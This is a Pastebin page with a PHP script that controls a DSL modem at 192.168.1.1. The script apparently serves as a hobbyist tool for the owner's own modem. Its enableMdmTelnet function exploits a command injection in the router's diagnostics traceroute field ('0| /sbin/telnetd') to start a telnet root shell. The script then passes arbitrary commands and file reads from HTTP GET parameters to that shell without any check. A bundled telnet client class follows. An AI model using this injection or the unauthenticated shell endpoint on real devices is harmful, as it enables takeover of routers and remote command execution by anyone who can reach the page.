SHARE
TWEET

Untitled

a guest Jan 21st, 2019 79 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. $mdmip = '192.168.1.1';
  3.  
  4. foreach ($_GET as $k => $v) {
  5.     if ($k == 'reboot') {
  6.         header('Content-type: text/plain');
  7.         echo executeMdmShellCmd('reboot');
  8.     }
  9.     if ($k == 'shellcmd') {
  10.         header('Content-type: text/plain');
  11.         echo executeMdmShellCmd($v);
  12.     }
  13.     if ($k == 'resync') {
  14.         header('Content-type: text/plain');
  15.         echo mdmDSLCPECmd('g997pmsft 3');
  16.         sleep(10);
  17.         echo mdmDSLCPECmd('g997pmsft 0');
  18.     }
  19.     if ($k == 'download') {
  20.         $f = split("/",$v);
  21.         $fn = $f[(count($f)-1)];
  22.         if (strpos($fn,'.') == '') {
  23.             $fn .= ".bin";
  24.         }
  25.         $data = executeMdmShellCmd('cat "'.$v.'"');
  26.         if (strlen($data) > 0) {
  27.             header('Content-Disposition: attachment; filename="'.$fn.'"');
  28.             header('Content-length: '.strlen($data));
  29.             echo $data;
  30.         }
  31.     }
  32. }
  33.  
  34. function mdmDSLCPECmd($c) {
  35.     executeMdmShellCmd('echo "'.$c.'" > /tmp/pipe/dsl_cpe0_cmd');
  36.     sleep(1);
  37.     return executeMdmShellCmd('cat /tmp/pipe/dsl_cpe0_ack');
  38. }
  39.  
  40.  
  41. function executeMdmShellCmd($cmd) {
  42.     $i = 0;
  43.     $telnet = new Telnet();
  44.     tstart:
  45.     $i++;
  46.     // Define prompt as something unique that will not exist in any file
  47.     $myprompt = chr(174).'zshell'.chr(175).' ';
  48.  
  49.     $result = $telnet->connect('192.168.1.1','','');
  50.     if ($result != false) {
  51.         // Wait for default prompt
  52.         $telnet->setPrompt('#');
  53.         $telnet->waitPrompt();
  54.         // Prepare for new prompt
  55.         $telnet->setPrompt($myprompt);
  56.         // Set new prompt
  57.         echo $telnet->exec("PS1='".$myprompt."'");
  58.         $telnet->waitPrompt();
  59.         // Now we can execute a command
  60.         $res = $telnet->exec($cmd);
  61.         // Remove the echoed back command
  62.         $resn = split("\n",$res);
  63.         $res='';
  64.         for ($i=0;$i<count($resn);$i++) {
  65.             if ($i > 0) {
  66.                 $res .= $resn[$i]."\n";
  67.             }
  68.         }
  69.         $telnet->disconnect();
  70.         return $res;
  71.     } else {
  72.         // If telnet server is not running, enable it via exploit.
  73.         // then try to execute our command again, up to 3 times.
  74.         if ($i < 3) {
  75.             enableMdmTelnet();
  76.             sleep(2);
  77.             goto tstart;
  78.         } else {
  79.             // Failure to start telnet server, or connect to it, or whatever
  80.         }
  81.     }
  82. }
  83.  
  84. function enableMdmTelnet() {
  85.     // Using an exploit, activate the telnet server
  86.     $cmd = "/sbin/telnetd";
  87.     $passwd = $_SERVER['PHP_AUTH_PW'];
  88.  
  89.     $c['next_page'] = "/htmlV/adv_diagnostics.asp";
  90.     $c['Self_Test'] = "";
  91.     $c['Ping_ISP_Router'] = "";
  92.     $c['diag_dns'] = "";
  93.     $c['diag_ping'] = "";
  94.     $c['diag_traceroute'] = "0| ".$cmd;
  95.     $c['diag_traceroute_maxhops'] = 1;
  96.     $cf = "";
  97.     foreach ($c as $k => $v) {
  98.         $cf .= $k."=".urlencode($v)."&";
  99.     }
  100.     $cf = rtrim($cf,"&");
  101.  
  102.     // Send the command
  103.     $u = "admin:".$passwd."@192.168.1.1/goform/EventForm";
  104.     $ch = curl_init();
  105.     $timeout = 10;
  106.     curl_setopt($ch, CURLOPT_URL, $u);
  107.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  108.     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  109.     curl_setopt($ch,CURLOPT_POST, 1);
  110.     curl_setopt($ch,CURLOPT_POSTFIELDS, $cf);
  111.     $data = curl_exec($ch);
  112.     curl_close($ch);
  113.  
  114.     // Give the modem a bit to process the command
  115.     sleep(2);
  116.  
  117.     // Request the form which is magically populated with the results
  118.     $u = "admin:".$passwd."@192.168.1.1".$c['next_page'];
  119.     $ch = curl_init();
  120.     $timeout = 5;
  121.     curl_setopt($ch, CURLOPT_URL, $u);
  122.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  123.     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  124.     $data = curl_exec($ch);
  125.     curl_close($ch);
  126. /*
  127.     // Filter out HTML
  128.     $res = getBetween($data,"--- Trace Route Test Results ---\n","</TEXTAREA>");
  129.     // Return raw shell command result
  130.     return $res;
  131. */
  132. }
  133.  
  134. function getBetween($src,$start,$end) {
  135. $c1 = (strpos($src,$start) + strlen($start));
  136. $c2 = strpos($src,$end,$c1);
  137. return substr($src,$c1,($c2 - $c1));
  138. }
  139.  
  140. /**
  141.  * Telnet class
  142.  *
  143.  * Used to execute remote commands via telnet connection
  144.  * Usess sockets functions and fgetc() to process result
  145.  *
  146.  * All methods throw Exceptions on error
  147.  *
  148.  * Written by Dalibor Andzakovic <dali@swerve.co.nz>
  149.  * Based on the code originally written by Marc Ennaji and extended by
  150.  * Matthias Blaser <mb@adfinis.ch>
  151.  */
  152. class Telnet {
  153.     private $host;
  154.     private $port;
  155.     private $timeout;
  156.     private $socket= NULL;
  157.     private $buffer = NULL;
  158.     private $prompt;
  159.     private $errno;
  160.     private $errstr;
  161.     private $NULL;
  162.     private $DC1;
  163.     private $WILL;
  164.     private $WONT;
  165.     private $DO;
  166.     private $DONT;
  167.     private $IAC;
  168.     const TELNET_ERROR = FALSE;
  169.     const TELNET_OK = TRUE;
  170.  
  171.     /**
  172.      * Constructor. Initialises host, port and timeout parameters
  173.      * defaults to localhost port 23 (standard telnet port)
  174.      *
  175.      * @param string $host Host name or IP addres
  176.      * @param int $port TCP port number
  177.      * @param int $timeout Connection timeout in seconds
  178.      * @return void
  179.     */
  180.     public function __construct($port = '23', $timeout = 10){
  181.         global $mdmip;
  182.         $this->host = $mdmip;
  183.         $this->port = $port;
  184.         $this->timeout = $timeout;
  185.  
  186.         // set some telnet special characters
  187.         $this->NULL = chr(0);
  188.         $this->DC1 = chr(17);
  189.         $this->WILL = chr(251);
  190.         $this->WONT = chr(252);
  191.         $this->DO = chr(253);
  192.         $this->DONT = chr(254);
  193.         $this->IAC = chr(255);
  194.         $this->connect();
  195.     }
  196.  
  197.     /**
  198.      * Destructor. Cleans up socket connection and command buffer
  199.      *
  200.      * @return void
  201.      */
  202.     public function __destruct() {
  203.         // cleanup resources
  204.         $this->disconnect();
  205.         $this->buffer = NULL;
  206.     }
  207.  
  208.     /**
  209.      * Attempts connection to remote host. Returns TRUE if sucessful.
  210.      *
  211.      * @return boolean
  212.      */
  213.     public function connect(){
  214.         // check if we need to convert host to IP
  215.         if (!preg_match('/([0-9]{1,3}\\.){3,3}[0-9]{1,3}/', $this->host)) {
  216.             $ip = gethostbyname($this->host);
  217.             if($this->host == $ip){
  218.                 throw new Exception("Cannot resolve $this->host");
  219.             } else{
  220.                 $this->host = $ip;
  221.             }
  222.         }
  223.         // attempt connection
  224.         $this->socket = fsockopen($this->host, $this->port, $this->errno, $this->errstr, $this->timeout);
  225.         if (!$this->socket){
  226.             return false;
  227.         }
  228.         return self::TELNET_OK;
  229.     }
  230.  
  231.     /**
  232.      * Closes IP socket
  233.      *
  234.      * @return boolean
  235.      */
  236.     public function disconnect(){
  237.         if ($this->socket){
  238.             if (! fclose($this->socket)){
  239.                 throw new Exception("Error while closing telnet socket");
  240.             }
  241.             $this->socket = NULL;
  242.         }
  243.         return self::TELNET_OK;
  244.     }
  245.  
  246.     /**
  247.      * Executes command and returns a string with result.
  248.      * This method is a wrapper for lower level private methods
  249.      *
  250.      * @param string $command Command to execute
  251.      * @return string Command result
  252.      */
  253.     public function exec($command, $addNewLine=true) {
  254.         $this->write($command, $addNewLine);
  255.         $this->waitPrompt();
  256.         return $this->getBuffer();
  257.     }
  258.  
  259.     /**
  260.      * Attempts login to remote host.
  261.      * This method is a wrapper for lower level private methods and should be
  262.      * modified to reflect telnet implementation details like login/password
  263.      * and line prompts. Defaults to standard unix non-root prompts
  264.      *
  265.      * @param string $username Username
  266.      * @param string $password Password
  267.      * @return boolean
  268.      */
  269.     public function login($username, $password) {
  270.         try{
  271.             $this->setPrompt('ogin:');
  272.             $this->waitPrompt();
  273.             $this->write($username);
  274.             $this->setPrompt('assword:');
  275.             $this->waitPrompt();
  276.             $this->write($password);
  277.             //$this->setPrompt();
  278.             //$this->waitPrompt();
  279.         } catch(Exception $e){
  280.             throw new Exception("Login failed.");
  281.         }
  282.         return self::TELNET_OK;
  283.     }
  284.  
  285.     /**
  286.      * Sets the string of characters to respond to.
  287.      * This should be set to the last character of the command line prompt
  288.      *
  289.      * @param string $s String to respond to
  290.      * @return boolean
  291.      */
  292.     public function setPrompt($s = '$'){
  293.         $this->prompt = $s;
  294.         return self::TELNET_OK;
  295.     }
  296.  
  297.     /**
  298.      * Gets character from the socket
  299.      *
  300.      * @return void
  301.      */
  302.     private function getc() {
  303.         return fgetc($this->socket);
  304.     }
  305.  
  306.     /**
  307.      * Clears internal command buffer
  308.      *
  309.      * @return void
  310.      */
  311.     private function clearBuffer() {
  312.         $this->buffer = '';
  313.     }
  314.  
  315.     /**
  316.      * Reads characters from the socket and adds them to command buffer.
  317.      * Handles telnet control characters. Stops when prompt is ecountered.
  318.      *
  319.      * @param string $prompt
  320.      * @return boolean
  321.      */
  322.     private function readTo($prompt){
  323.         if (!$this->socket){
  324.             throw new Exception("Telnet connection closed");
  325.         }
  326.         // clear the buffer
  327.         $this->clearBuffer();
  328.         do{
  329.             $c = $this->getc();
  330.             if ($c === false){
  331.                 throw new Exception("Couldn't find the requested : '" . $prompt . "', it was not in the data returned from server : '" . $buf . "'");
  332.             }
  333.             // Interpreted As Command
  334.             if ($c == $this->IAC) {
  335.                 if ($this->negotiateTelnetOptions()){
  336.                     continue;
  337.                 }
  338.             }
  339.             // append current char to global buffer
  340.             $this->buffer .= $c;
  341.             // we've encountered the prompt. Break out of the loop
  342.             if ((substr($this->buffer, strlen($this->buffer) - strlen($prompt))) == $prompt){
  343.                 return self::TELNET_OK;
  344.             }
  345.         } while($c != $this->NULL || $c != $this->DC1);
  346.     }
  347.  
  348.     /**
  349.      * Write command to a socket
  350.      *
  351.      * @param string $buffer Stuff to write to socket
  352.      * @param boolean $addNewLine Default true, adds newline to the command
  353.      * @return boolean
  354.      */
  355.     public function write($buffer, $addNewLine=true){
  356.         if (!$this->socket){
  357.             throw new Exception("Telnet connection closed");
  358.         }
  359.         // clear buffer from last command
  360.         $this->clearBuffer();
  361.         if ($addNewLine == true){
  362.             $buffer .= "\n";
  363.         }
  364.         if (!fwrite($this->socket, $buffer) < 0){
  365.             throw new Exception("Error writing to socket");
  366.         }
  367.         return self::TELNET_OK;
  368.     }
  369.  
  370.     /**
  371.      * Returns the content of the command buffer
  372.      *
  373.      * @return string Content of the command buffer
  374.      */
  375.     private function getBuffer(){
  376.         // cut last line (is always prompt)
  377.         $buf = explode("\n", $this->buffer);
  378.         unset($buf[count($buf)-1]);
  379.         $buf = implode("\n",$buf);
  380.         return trim($buf);
  381.     }
  382.  
  383.     /**
  384.      * Telnet control character magic
  385.      *
  386.      * @param string $command Character to check
  387.      * @return boolean
  388.      */
  389.     private function negotiateTelnetOptions(){
  390.         $c = $this->getc();
  391.         if ($c != $this->IAC){
  392.             if (($c == $this->DO) || ($c == $this->DONT)){
  393.                 $opt = $this->getc();
  394.                 fwrite($this->socket, $this->IAC . $this->WONT . $opt);
  395.             } else if (($c == $this->WILL) || ($c == $this->WONT)) {
  396.                 $opt = $this->getc();
  397.                 fwrite($this->socket, $this->IAC . $this->DONT . $opt);
  398.             } else {
  399.                 throw new Exception('Error: unknown control character ' . ord($c ));
  400.             }
  401.         } else{
  402.             throw new Exception('Error: Something Wicked Happened');
  403.         }
  404.         return self::TELNET_OK;
  405.     }
  406.  
  407.     /**
  408.      * Reads socket until prompt is encountered
  409.      */
  410.     public function waitPrompt($prompt=null){
  411.         if (!$prompt) $prompt = $this->prompt;
  412.             return $this->readTo($prompt);
  413.     }
  414. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top